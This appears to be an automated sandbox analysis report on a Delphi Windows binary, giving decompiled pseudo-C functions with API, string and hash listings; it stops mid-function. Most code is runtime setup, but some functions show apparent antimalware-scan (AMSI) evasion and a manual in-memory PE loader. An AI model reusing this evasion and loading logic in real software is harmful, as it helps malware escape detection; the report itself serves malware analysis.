                                                                            • Instruction Fuzzy Hash: 62418070600700AFE710EF69DD92F6A3399AB04715F55417AFD00EB2D3EAB9AC448B6D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 86%
E004478D4(void* __ebx, void* __edi, void* __eflags) {
    char _v8;
    char _v12;
    char _v16;
    char _v20;
    char _v24;
    long _v28;
    char _v32;
    char _v36;
    intOrPtr _t25;
    short _t27;
    char _t29;
    intOrPtr _t35;
    intOrPtr _t38;
    intOrPtr _t47;
    intOrPtr _t49;
    intOrPtr* _t50;
    intOrPtr _t53;
    struct HINSTANCE__* _t63;
    intOrPtr* _t78;
    intOrPtr* _t80;
    intOrPtr _t83;
    void* _t87;

    _v20 = 0;
    _v8 = 0;
    _push(_t87);
    _push(0x447a4c);
    _push(*[fs:eax]);
    *[fs:eax] = _t87 + 0xffffffe0;
    _v16 = GetCurrentProcessId();
    _v12 = 0;
    E0040970C("Delphi%.8X", 0, &_v16, &_v8);
    E00404790(0x466504, _v8);
    _t25 = *0x466504; // 0x270a898
    _t27 = GlobalAddAtomA(E00404C00(_t25)); // executed
    *0x466500 = _t27;
    _t29 = *0x4657f8; // 0x400000
    _v36 = _t29;
    _v32 = 0;
    _v28 = GetCurrentThreadId();
    _v24 = 0;
    E0040970C("ControlOfs%.8X%.8X", 1, &_v36, &_v20);
    E00404790(0x466508, _v20);
    _t35 = *0x466508; // 0x2711cc0
    *0x466502 = GlobalAddAtomA(E00404C00(_t35));
    _t38 = *0x466508; // 0x2711cc0
    *0x46650c = RegisterWindowMessageA(E00404C00(_t38));
    *0x466544 = E0041AA24(1);
    E004474DC();
    *0x4664ec = E00447288(1, 1);
    _t47 = E004543D8(1, __edi);
    _t78 = *0x462f14; // 0x466584
    *_t78 = _t47;
    _t49 = E004555E0(0, 1);
    _t80 = *0x462da4; // 0x466580
    *_t80 = _t49;
    _t50 = *0x462da4; // 0x466580
    E00457684(*_t50, 1);
    _t53 = *0x434ea4; // 0x434ea8
    E0041A1CC(_t53, 0x4376cc, 0x4376dc);
    _t63 = GetModuleHandleA("USER32");
    if(_t63 != 0) {
        *0x46255c = GetProcAddress(_t63, "AnimateWindow");
    }
    _pop(_t83);
    *[fs:eax] = _t83;
    _push(0x447a53);
    E0040473C(&_v20);
    return E0040473C(&_v8);
}


                                                                            APIs
                                                                            • GetCurrentProcessId.KERNEL32(?,00000000,00447A4C), ref: 004478F5
                                                                            • GlobalAddAtomA.KERNEL32 ref: 00447928
                                                                            • GetCurrentThreadId.KERNEL32 ref: 00447943
                                                                            • GlobalAddAtomA.KERNEL32 ref: 00447979
                                                                            • RegisterWindowMessageA.USER32(00000000,00000000,?,00000000,?,00000000,00447A4C), ref: 0044798F
                                                                              • Part of subcall function 0041AA24: InitializeCriticalSection.KERNEL32(00418518,?,?,004479A5,00000000,00000000,?,00000000,?,00000000,00447A4C), ref: 0041AA43
                                                                              • Part of subcall function 004474DC: SetErrorMode.KERNEL32(00008000), ref: 004474F5
                                                                              • Part of subcall function 004474DC: GetModuleHandleA.KERNEL32(USER32,00000000,00447642,?,00008000), ref: 00447519
                                                                              • Part of subcall function 004474DC: GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 00447526
                                                                              • Part of subcall function 004474DC: LoadLibraryA.KERNEL32(imm32.dll,00000000,00447642,?,00008000), ref: 00447542
                                                                              • Part of subcall function 004474DC: GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 00447564
                                                                              • Part of subcall function 004474DC: GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 00447579
                                                                              • Part of subcall function 004474DC: GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 0044758E
                                                                              • Part of subcall function 004474DC: GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 004475A3
                                                                              • Part of subcall function 004474DC: GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 004475B8
                                                                              • Part of subcall function 004474DC: GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 004475CD
                                                                              • Part of subcall function 004474DC: GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 004475E2
                                                                              • Part of subcall function 004474DC: GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 004475F7
                                                                              • Part of subcall function 004474DC: GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 0044760C
                                                                              • Part of subcall function 004474DC: GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 00447621
                                                                              • Part of subcall function 004474DC: SetErrorMode.KERNEL32(?,00447649,00008000), ref: 0044763C
                                                                              • Part of subcall function 004543D8: GetKeyboardLayout.USER32 ref: 0045441D
                                                                              • Part of subcall function 004543D8: GetDC.USER32(00000000), ref: 00454472
                                                                              • Part of subcall function 004543D8: GetDeviceCaps.GDI32(00000000,0000005A), ref: 0045447C
                                                                              • Part of subcall function 004543D8: ReleaseDC.USER32 ref: 00454487
                                                                              • Part of subcall function 004555E0: LoadIconA.USER32 ref: 004556D7
                                                                              • Part of subcall function 004555E0: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,004479E4,00000000,00000000,?,00000000,?,00000000,00447A4C), ref: 00455709
                                                                              • Part of subcall function 004555E0: OemToCharA.USER32 ref: 0045571C
                                                                              • Part of subcall function 004555E0: CharNextA.USER32(?,?,?,00400000,?,00000100,00400000,MAINICON,?,?,?,004479E4,00000000,00000000,?,00000000), ref: 0045575B
                                                                              • Part of subcall function 004555E0: CharLowerA.USER32(00000000,?,?,?,00400000,?,00000100,00400000,MAINICON,?,?,?,004479E4,00000000,00000000,?), ref: 00455761
                                                                            • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,00447A4C), ref: 00447A13
                                                                            • GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 00447A24
                                                                            Strings
                                                                            • ControlOfs%.8X%.8X , xrefs: 00447957
                                                                            • AnimateWindow , xrefs: 00447A1E
                                                                            • 0sC , xrefs: 004479B1
                                                                            • USER32 , xrefs: 00447A0E
                                                                            • Delphi%.8X , xrefs: 00447906
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: AddressProc$CharModule$AtomCurrentErrorGlobalHandleLoadMode$CapsCriticalDeviceFileIconInitializeKeyboardLayoutLibraryLowerMessageNameNextProcessRegisterReleaseSectionThreadWindow
                                                                            • String ID: 0sC$AnimateWindow$ControlOfs%.8X%.8X$Delphi%.8X$USER32
                                                                            • API String ID: 1515865724-1439261924
                                                                            • Opcode ID: 1cab24320c825aae389d2ad9d806f951871264bbd0d0d4677ce10ca45a00fae6
                                                                            • Instruction ID: dcfdd3a89ae3525500325092b6b3c25abddc81a31b1afbe156e43ea57f3249c9
                                                                            • Opcode Fuzzy Hash: 1cab24320c825aae389d2ad9d806f951871264bbd0d0d4677ce10ca45a00fae6
                                                                            • Instruction Fuzzy Hash: 634193B0604205AFD700EFA9ED42A8D77F5EB44308B01457BF401F73A2EB79A9008B5E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 91%
E004555E0(void* __ecx, char __edx) {
    char _v5;
    char _v261;
    void* __ebx;
    void* __ebp;
    intOrPtr _t42;
    intOrPtr _t45;
    intOrPtr _t46;
    struct HINSTANCE__** _t58;
    intOrPtr _t63;
    struct HINSTANCE__** _t65;
    void* _t72;
    char* _t74;
    CHAR* _t76;
    intOrPtr _t80;
    char* _t81;
    intOrPtr _t87;
    intOrPtr* _t94;
    intOrPtr* _t95;
    intOrPtr _t96;
    void* _t97;
    char _t99;
    void* _t111;
    void* _t112;

    _t99 = __edx;
    _t97 = __ecx;
    if(__edx != 0) {
        _t112 = _t112 + 0xfffffff0;
        _t42 = E00403C34(_t42, _t111);
    }
    _v5 = _t99;
    _t96 = _t42;
    E00420664(_t97, 0);
    _t45 = *0x462d08; // 0x461bc8
    if(*((short*)(_t45 + 2)) == 0) {
        _t95 = *0x462d08; // 0x461bc8
        *((intOrPtr*)(_t95 + 4)) = _t96;
        *_t95 = 0x457090;
    }
    _t46 = *0x462dc0; // 0x461bd0
    if(*((short*)(_t46 + 2)) == 0) {
        _t94 = *0x462dc0; // 0x461bd0
        *((intOrPtr*)(_t94 + 4)) = _t96;
        *_t94 = E0045729C;
    }
    *((char*)(_t96 + 0x34)) = 0;
    *((intOrPtr*)(_t96 + 0x90)) = E004038F8(1);
    *((intOrPtr*)(_t96 + 0x98)) = E004038F8(1);
    *((intOrPtr*)(_t96 + 0xb0)) = E004038F8(1);
    *((intOrPtr*)(_t96 + 0x60)) = 0;
    *((intOrPtr*)(_t96 + 0x84)) = 0;
    *((intOrPtr*)(_t96 + 0x5c)) = 0xff000018;
    *((intOrPtr*)(_t96 + 0x78)) = 0x1f4;
    *((char*)(_t96 + 0x7c)) = 1;
    *((intOrPtr*)(_t96 + 0x80)) = 0;
    *((intOrPtr*)(_t96 + 0x74)) = 0x9c4;
    *((char*)(_t96 + 0x88)) = 0;
    *((char*)(_t96 + 0xa5)) = 1;
    *((char*)(_t96 + 0xbc)) = 1;
    _t110 = E0042A7FC(1);
    *((intOrPtr*)(_t96 + 0xa0)) = _t57;
    _t58 = *0x462c04; // 0x463030
    E0042ABD0(_t110, LoadIconA(*_t58, "MAINICON"));
    _t21 = _t96 + 0xa0; // 0x736d
    _t63 = *_t21;
    *((intOrPtr*)(_t63 + 0x14)) = _t96;
    *((intOrPtr*)(_t63 + 0x10)) = 0x45795c;
    _t65 = *0x462c04; // 0x463030
    GetModuleFileNameA(*_t65, &_v261, 0x100);
    OemToCharA(&_v261, &_v261);
    _t72 = E0040CEC8(&_v261, 0x5c);
    if(_t72 != 0) {
        _t28 = _t72 + 1; // 0x1
        E00409044(&_v261, _t28);
    }
    _t74 = E0040CEFC(&_v261, 0x2e);
    if(_t74 != 0) {
        *_t74 = 0;
    }
    _t76 = CharNextA(&_v261); // executed
    CharLowerA(_t76);
    _t32 = _t96 + 0x8c; // 0x44c90c
    E004049AC(_t32, 0x100, &_v261);
    *((char*)(_t96 + 0xd4)) = 0;
    _t80 = E004217E0(0x456bf0, _t96); // executed
    *((intOrPtr*)(_t96 + 0xc8)) = _t80;
    _t81 = *0x462adc; // 0x463038
    if(*_t81 == 0) {
        E00455934(_t96, _t96, 0x100); // executed
    }
    *((char*)(_t96 + 0x59)) = 1;
    *((char*)(_t96 + 0x5a)) = 1;
    *((char*)(_t96 + 0x5b)) = 1;
    *((char*)(_t96 + 0xa6)) = 1;
    *((intOrPtr*)(_t96 + 0xa8)) = 0;
    E00457B38(_t96, 0x100);
    E00458698(_t96);
    _t87 = _t96;
    if(_v5 != 0) {
        E00403C8C(_t87);
        _pop(*[fs:0x0]);
    }
    return _t96;
}

                                                                            0x004557b1
                                                                            0x004557ba
                                                                            0x004557c2
                                                                            0x004557c9
                                                                            0x004557ce
                                                                            0x004557d4
                                                                            0x004557d6
                                                                            0x004557db
                                                                            0x004557e2
                                                                            0x004557ec

                                                                            APIs
                                                                            • LoadIconA.USER32 ref: 004556D7
                                                                            • GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,004479E4,00000000,00000000,?,00000000,?,00000000,00447A4C), ref: 00455709
                                                                            • OemToCharA.USER32 ref: 0045571C
                                                                            • CharNextA.USER32(?,?,?,00400000,?,00000100,00400000,MAINICON,?,?,?,004479E4,00000000,00000000,?,00000000), ref: 0045575B
                                                                            • CharLowerA.USER32(00000000,?,?,?,00400000,?,00000100,00400000,MAINICON,?,?,?,004479E4,00000000,00000000,?), ref: 00455761
                                                                              • Part of subcall function 00455934: GetClassInfoA.USER32 ref: 00455993
                                                                              • Part of subcall function 00455934: RegisterClassA.USER32 ref: 004559AB
                                                                              • Part of subcall function 00455934: SetWindowLongA.USER32(0000000E,000000FC,10CC0000), ref: 00455A47
                                                                              • Part of subcall function 00455934: SendMessageA.USER32(0000000E,00000080,00000001,00000000), ref: 00455A69
                                                                            Strings
                                                                            • 00F , xrefs: 004556CF, 00455701
                                                                            • MAINICON , xrefs: 004556CA
                                                                            • 80F , xrefs: 00455794
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Char$Class$FileIconInfoLoadLongLowerMessageModuleNameNextRegisterSendWindow
                                                                            • String ID: 00F$80F$MAINICON
                                                                            • API String ID: 2763768735-2155582179
                                                                            • Opcode ID: 140bc95ab58d9b9ad052038345c73fd038fbbacc063635515f1d9b8afcd3790a
                                                                            • Instruction ID: 3d65150858da70b31048973324385ee2371e73c537065fabeb210eff4a88cc2d
                                                                            • Opcode Fuzzy Hash: 140bc95ab58d9b9ad052038345c73fd038fbbacc063635515f1d9b8afcd3790a
                                                                            • Instruction Fuzzy Hash: B2516F706042849FDB10EF39D885B867BE4AF15308F4440BAEC48DF397DBB99948CB69
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 72%
E0040D05C(void* __ebx, void* __edx, void* __edi, void* __esi) {
    char _v8;
    char _v12;
    char _v16;
    char _v20;
    char _v24;
    char _v28;
    char _v32;
    char _v36;
    char _v40;
    char _v44;
    char _v48;
    char _v52;
    char _v56;
    char _v60;
    char _v64;
    char _v68;
    void* _t104;
    void* _t111;
    void* _t133;
    intOrPtr _t183;
    intOrPtr _t193;
    intOrPtr _t194;

    _t191 = __esi;
    _t190 = __edi;
    _t193 = _t194;
    _t133 = 8;
    do {
        _push(0);
        _push(0);
        _t133 = _t133 - 1;
    } while (_t133 != 0);
    _push(__ebx);
    _push(_t193);
    _push(0x40d327);
    _push( *[fs:eax]);
    *[fs:eax] = _t194; // executed
    E0040CF98(); // executed
    E0040BA08(__ebx, __edi, __esi);
    _t196 =  *0x4658d4;
    if( *0x4658d4 != 0) {
        E0040BBE0(__esi, _t196);
    }
    _t132 = GetThreadLocale();
    E0040B954(_t43, 0, 0x14,  &_v20);
    E00404790(0x465808, _v20);
    E0040B954(_t43, 0x40d33c, 0x1b,  &_v24);
    *0x46580c = E00408B44(0x40d33c, 0, _t196);
    E0040B954(_t132, 0x40d33c, 0x1c,  &_v28);
    *0x46580d = E00408B44(0x40d33c, 0, _t196);
    *0x46580e = E0040B9A0(_t132, 0x2c, 0xf);
    *0x46580f = E0040B9A0(_t132, 0x2e, 0xe);
    E0040B954(_t132, 0x40d33c, 0x19,  &_v32);
    *0x465810 = E00408B44(0x40d33c, 0, _t196);
    *0x465811 = E0040B9A0(_t132, 0x2f, 0x1d);
    E0040B954(_t132, "m/d/yy", 0x1f,  &_v40);
    E0040BC90(_v40, _t132,  &_v36, _t190, _t191, _t196);
    E00404790(0x465814, _v36);
    E0040B954(_t132, "mmmm d, yyyy", 0x20,  &_v48);
    E0040BC90(_v48, _t132,  &_v44, _t190, _t191, _t196);
    E00404790(0x465818, _v44);
    *0x46581c = E0040B9A0(_t132, 0x3a, 0x1e);
    E0040B954(_t132, 0x40d370, 0x28,  &_v52);
    E00404790(0x465820, _v52);
    E0040B954(_t132, 0x40d37c, 0x29,  &_v56);
    E00404790(0x465824, _v56);
    E0040473C( &_v12);
    E0040473C( &_v16);
    E0040B954(_t132, 0x40d33c, 0x25,  &_v60);
    _t104 = E00408B44(0x40d33c, 0, _t196);
    _t197 = _t104;
    if(_t104 != 0) {
        E004047D4( &_v8, 0x40d394);
    } else {
        E004047D4( &_v8, 0x40d388);
    }
    E0040B954(_t132, 0x40d33c, 0x23,  &_v64);
    _t111 = E00408B44(0x40d33c, 0, _t197);
    _t198 = _t111;
    if(_t111 == 0) {
        E0040B954(_t132, 0x40d33c, 0x1005,  &_v68);
        if(E00408B44(0x40d33c, 0, _t198) != 0) {
            E004047D4( &_v12, 0x40d3b0);
        } else {
            E004047D4( &_v16, 0x40d3a0);
        }
    }
    _push(_v12);
    _push(_v8);
    _push(":mm");
    _push(_v16);
    E00404AC0();
    _push(_v12);
    _push(_v8);
    _push(":mm:ss");
    _push(_v16);
    E00404AC0();
    *0x4658d6 = E0040B9A0(_t132, 0x2c, 0xc);
    _pop(_t183);
    *[fs:eax] = _t183;
    _push(E0040D32E);
    return E00404760( &_v68, 0x10);
}


                                                                            APIs
                                                                            • GetThreadLocale.KERNEL32(00000000,0040D327,?,?,00000000,00000000), ref: 0040D092
                                                                              • Part of subcall function 0040B954: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040B972
                                                                            Strings
                                                                            • AMPM , xrefs: 0040D2A6
                                                                            • AMPM , xrefs: 0040D2B5
                                                                            • m/d/yy , xrefs: 0040D161
                                                                            • :mm , xrefs: 0040D2C5
                                                                            • :mm:ss , xrefs: 0040D2E2
                                                                            • mmmm d, yyyy , xrefs: 0040D18E
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Locale$InfoThread
                                                                            • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                            • API String ID: 4232894706-2493093252
                                                                            • Opcode ID: b5e0a9655523728610d75e5f6b93e2a53b5ce1a3b15ab957e18a3459b3b457b6
                                                                            • Instruction ID: c9001327b6f8c8ca4ed95205664730ab35d4fa54160187d9b8d5148293e8bd77
                                                                            • Opcode Fuzzy Hash: b5e0a9655523728610d75e5f6b93e2a53b5ce1a3b15ab957e18a3459b3b457b6
                                                                            • Instruction Fuzzy Hash: 0D615E70B001499BDB00FBE5D891A9E76A6DB88304F50D43BB601BB7C6DB3CD919879E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 48%
E00460860(void* __ebx, void* __edi, void* __esi) {
    char _v8;
    char _v12;
    char _v16;
    char _v20;
    intOrPtr _v24;
    intOrPtr _v28;
    char _v32;
    intOrPtr* _t53;
    void* _t60;
    intOrPtr _t61;
    intOrPtr _t64;
    intOrPtr _t67;
    intOrPtr _t74;
    signed int _t75;
    intOrPtr _t86;
    signed int _t91;
    intOrPtr _t99;
    intOrPtr _t104;
    intOrPtr _t105;
    intOrPtr _t107;
    intOrPtr _t108;
    intOrPtr _t112;
    intOrPtr _t114;
    intOrPtr _t126;
    void* _t132;
    void* _t139;
    void* _t140;
    intOrPtr _t143;

    _t140 = __esi;
    _t139 = __edi;
    _push(0);
    _push(0);
    _push(0);
    _push(0);
    _push(0);
    _push(0);
    _push(0);
    _push(_t143);
    _push(0x460b18);
    _push( *[fs:eax]);
    *[fs:eax] = _t143;
    *0x46679c =  *0x46679c - 1;
    if( *0x46679c < 0) {
        0;
        _push(0x124f2); // executed
        L0045F394(); // executed
        if(0 == 0) {
            E00404790(0x466744, 0x460b44);
        } else {
            E00404790(0x466744, "rrrrrrrtutFrk");
        }
        _t99 =  *0x466744; // 0x26f5078
        E00404A4C( &_v8, _t99, 0x460b50);
        E0045EBB0(_v8, 0x4666d8, 0x4666c8, "DllRegisterServer", _t140); // executed
        E004072FC(0x4666c8, L0045F39C);
        if( *0x4666d4 <= 0x206a) {
            0;
            E0045EBB0("mssip32", 0x4666d8, 0x4666c8, "DllRegisterServer", _t140); // executed
            E004072FC(0x4666c8, L0045F39C);
            E00404AC0();
            E00404934( &_v12, E00404C00(_v16));
            _t104 =  *0x4657f8; // 0x400000
            *0x466730 = E0041CF2C(_t104, 1, 0xa, _v12);
            _t53 =  *0x466730; // 0x270a970
            *0x4666bc =  *((intOrPtr*)( *_t53))(0x460b94,  *0x466744, 0x460b88);
            _t126 =  *0x4666bc; // 0x35986
            E00404E88(0x466768, _t126);
            _t60 = E00404C58(0x466768);
            _t61 =  *0x466730; // 0x270a970
            _t7 = _t61 + 4; // 0xe
            _t105 =  *0x4666bc; // 0x35986
            E00402EFC( *_t7, 0x4666d8, _t105, _t60);
            _t64 =  *0x466730; // 0x270a970
            E00403928(_t64);
            _t67 =  *0x466768; // 0x2685838
            E0045F4E8(_t67,  &_v20, 0x460ba0);
            _t107 =  *0x45f30c; // 0x45f310
            E00405BC4(0x46676c, _t107, _v20);
            E0040473C(0x466750);
            _t74 =  *0x46676c; // 0x26d0c98
            _t10 = _t74 + 8; // 0x264fe08
            _t75 =  *_t10;
            __eflags = _t75;
            if(_t75 != 0) {
                _t91 = _t75 - 4;
                __eflags = _t91;
                _t75 =  *_t91;
            }
            __eflags = _t75 - 1;
            if(_t75 >= 1) {
                *0x4666d8 = _t75;
                do {
                    E00404924();
                    _t75 = E00404A08(0x466750, _v24);
                    *0x4666d8 =  *0x4666d8 - 1;
                    __eflags =  *0x4666d8;
                } while ( *0x4666d8 != 0);
            }
            _push(0x460b50);
            _push( *0x466744);
            _push("ScanString");
            E00404AC0();
            _push(_v28);
            _t108 =  *0x466744; // 0x26f5078
            E00404A4C( &_v32, _t108, 0x460b50);
            _pop(_t132);
            E0045EBB0(_v32, 0x4666d8, 0x4666c8, _t132, _t140);
            __eflags = E004072FC(0x4666c8, L0045F39C) * 0x177;
            _t86 =  *0x466750; // 0x261c4d8, executed
            E0045EEE8(_t86, 0x4666d8, _t139, _t140, E004072FC(0x4666c8, L0045F39C) * 0x177); // executed
        } else {
            L0045F39C();
        }
    }
    _pop(_t112);
    *[fs:eax] = _t112;
    _push(0x460b1f);
    E00404760( &_v32, 3);
    _t114 =  *0x45f30c; // 0x45f310
    E00405B88( &_v20, _t114);
    return E00404760( &_v16, 3);
}


                                                                            APIs
                                                                            • InetIsOffline.URL(000124F2,00000000,00460B18,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0046089B
                                                                            • AuditFree.ADVAPI32(000124F2,00000000,00460B18,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0046090C
                                                                              • Part of subcall function 0045EBB0: LoadLibraryA.KERNEL32(00000000,00000000,0045EC57), ref: 0045EBF9
                                                                              • Part of subcall function 0045EBB0: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,0045EC57), ref: 0045EC01
                                                                              • Part of subcall function 0045EBB0: GetProcAddress.KERNEL32(738C0000,00000000), ref: 0045EC35
                                                                            Strings
                                                                            • Msi , xrefs: 004608BA
                                                                            • DllRegisterServer , xrefs: 004608DF, 00460923
                                                                            • rrrrrrrtutFrk , xrefs: 004608A9
                                                                            • mssip32 , xrefs: 00460928
                                                                            • ScanString , xrefs: 00460A87
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: AddressAuditFreeHandleInetLibraryLoadModuleOfflineProc
                                                                            • String ID: DllRegisterServer$Msi$ScanString$mssip32$rrrrrrrtutFrk
                                                                            • API String ID: 1378522473-1273433984
                                                                            • Opcode ID: 1a1d8f9adc02558ed4163bbe0ea72374faa3b49d1cfe5cb0d8b7d1e1aed7a199
                                                                            • Instruction ID: bf328fdb3b7fff0191df84ddc3a21c00582c8a3fcbdfa349bb387af89ecb309a
                                                                            • Opcode Fuzzy Hash: 1a1d8f9adc02558ed4163bbe0ea72374faa3b49d1cfe5cb0d8b7d1e1aed7a199
                                                                            • Instruction Fuzzy Hash: 1951B0743002058BD700EBA5D942A6A73A5EB85309F51C07BE900AB7E2EB7CED05CB5F
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 40%
                                                                                                                                  E0045EEE8(char __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) { 				char _v8; 				char _v16; 				intOrPtr _v20; 				char _v24; 				intOrPtr _t73; 				intOrPtr _t74; 				void* _t81; 				struct HINSTANCE__* _t115; 				intOrPtr _t125; 				long _t127; 				intOrPtr _t128; 				intOrPtr _t130; 				signed int _t135; 				signed int _t139; 				long _t142; 				signed int _t144; 				void* _t147; 				signed int _t150; 				void* _t154; 				void* _t156; 				void* _t157; 				void* _t158; 				intOrPtr _t171; 				intOrPtr _t193; 				void* _t213; 				void* _t225; 				intOrPtr _t230; 				intOrPtr _t232; 				intOrPtr _t234; 				intOrPtr _t235; 				intOrPtr _t236; 				intOrPtr _t237; 				signed int _t241; 				intOrPtr* _t246;  				_push(0); 				_push(0); 				_push(0); 				_push(0); 				_push(0); 				_push(__ebx); 				_v8 = __eax; 				E00404BF0(_v8); 				_push(_t246); 				_push(0x45f200); 				_push( *[fs:eax]); 				 *[fs:eax] = _t246; 				E00404790(0x466694, 0x45f21c); 				_push(0xd); 				_push(0xd); 				_push(0x1d); 				E00404A4C( &_v16, _v8, 0x45f228); 				 *0x466634 = _v16; 				_push(0xd); 				_push(0xd); 				_push(0x1d); 				_push(0x45f244); 				_push( *0x466694); 				_push("ScanBuffer"); 				E00404AC0(); 				_push(_v20); 				_t171 =  *0x466694; // 0x26f5088 				E00404A4C( &_v24, _t171, 0x45f244); 				_pop(_t225); 				E0045EBB0(_v24, __ebx, 0x4666a0, _t225, 0x466644); 				E004072FC(0x4666a0, 0x466694); 				_t73 =  *0x466634; // 0x2666268 				_push(0); 				_push(_t73); 				_t74 =  *0x466634; // 0x2666268 				_t10 = _t74 + 0x3c; // 0x100 				asm("cdq"); 				asm("adc edx, [esp+0x4]"); 				 *0x46663c =  *_t10 +  *_t246; 				_push(0xd); 				_push(0xd); 				_push(0x1d); 				_t81 = VirtualAlloc(0,  *( *0x46663c + 0x50), 0x2000, 1); // executed 				 *0x466630 = _t81; 				_push(0xd); 				_push(0xd); 				_push(0x1d); 				 *0x466638 =  *0x466630 -  
*((intOrPtr*)( *0x46663c + 0x34)); 				_push(0xd); 				_push(0xd); 				_push(0x1d); 				_t230 =  *0x46663c; 				_t231 =  *(_t230 + 0x14) & 0x0000ffff; 				 *0x466640 =  *0x46663c + 0x18 + ( *(_t230 + 0x14) & 0x0000ffff); 				_push(0xd); 				_push(0xd); 				_t193 = 0x10; 				_push(0x1d); 				_t154 = ( *( *0x46663c + 6) & 0x0000ffff) - 1; 				if(_t154 >= 0) { 					_t158 = _t154 + 1; 					 *0x466644 = 0; 					do { 						_push(_t193); 						_t135 =  *0x466644 +  *0x466644 * 4; 						_t234 =  *0x466640; // 0x2666460 						_t18 = _t135 * 8; // 0x10550 						 *0x46664c =  *(_t234 + _t18 + 8); 						_push(_t193); 						_t139 =  *0x466644 +  *0x466644 * 4; 						_t235 =  *0x466640; // 0x2666460 						_t23 = _t139 * 8; // 0x10600 						 *0x466650 =  *((intOrPtr*)(_t235 + _t23 + 0x10)); 						_push(_t193); 						_t142 =  *0x46664c; // 0x10 						_t144 =  *0x466644 +  *0x466644 * 4; 						_t236 =  *0x466640; // 0x2666460 						_t28 = _t144 * 8; // 0x1000 						_t147 = VirtualAlloc( *((intOrPtr*)(_t236 + _t28 + 0xc)) +  *0x466630, _t142, 0x1000, 4); // executed 						 *0x466648 = _t147; 						_push(_t193); 						_t150 =  *0x466644 +  *0x466644 * 4; 						_t237 =  *0x466640; // 0x2666460 						_t33 = _t150 * 8; // 0x400 						_t231 =  *0x466648; // 0x228b000 						_t193 =  *0x466650; // 0x200 						E00402EFC( *((intOrPtr*)(_t237 + _t33 + 0x14)) +  *0x466634, _t158, _t193, _t231); 						 *0x466644 =  *0x466644 + 1; 						_t158 = _t158 - 1; 					} while (_t158 != 0); 				} 				_push(0xd); 				_push(0xd); 				_push(0x1d); 				 *0x466658 =  *((intOrPtr*)( *0x46663c + 0x28)) +  *0x466630; 				_push(0xd); 				_push(0xd); 				_push(0x1d); 				E0045ECE4( *((intOrPtr*)( *0x46663c + 0xa0)) +  *0x466630); 				_push(0xd); 				_push(0xd); 				_push(0x1d); 				E0045ED90( *((intOrPtr*)( *0x46663c + 0x80)) +  *0x466630, _t154, 0x46663c, 0x466644); // executed 				_push(0xd); 				_push(0xd); 				_t213 = _t193 + 3 - 1 + 4 - 1 + 4 - 1 + 4 - 1 + 1; 				_push(0x1d); 				_t156 = ( *( *0x46663c + 6) & 
